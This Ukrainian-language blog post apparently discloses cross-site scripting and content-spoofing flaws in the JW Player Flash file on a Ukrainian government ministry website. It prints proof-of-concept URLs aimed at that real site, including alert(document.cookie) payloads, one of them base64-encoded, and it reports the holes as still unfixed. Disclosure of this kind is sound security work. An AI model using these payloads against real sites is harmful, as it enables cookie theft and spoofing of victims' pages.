Websecurity - Веб безпека

30.10.2013

У жовтні, 27.10.2013, я знайшов Cross-Site Scripting та Content Spoofing уразливості на сайті Держмолодьспорту - http://dsmsu.gov.ua. Про що найближчим часом сповіщу адміністрацію сайта.

Стосовно державних сайтів в останнє я писав про уразливості на nrcu.gov.ua та www.bank.gov.ua.

Детальна інформація про уразливості з’явиться пізніше.

14.02.2014

Уразливості в JW Player я описав в попередні роки.

XSS:

http://dsmsu.gov.ua/templates/default/js/jwplayer/player.swf?playerready=alert(document.cookie)
http://dsmsu.gov.ua/templates/default/js/jwplayer/player.swf?displayclick=link&link=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B&file=1.jpg

Та інші XSS уразливості в JW Player.

Content Spoofing:

http://dsmsu.gov.ua/templates/default/js/jwplayer/player.swf?file=1.flv&backcolor=0xFFFFFF&screencolor=0xFFFFFF
http://dsmsu.gov.ua/templates/default/js/jwplayer/player.swf?file=1.flv&image=1.jpg

Та інші CS уразливості в JW Player.

На сайті є й інші дірки, про які я повідомив адмінам та розробникам движка, що розробляли сайт. Дані уразливості досі не виправлені.

This entry was posted on 17:23 14.02.2014 and is filed under Уразливості. You can follow any responses to this entry through the RSS 2.0 feed.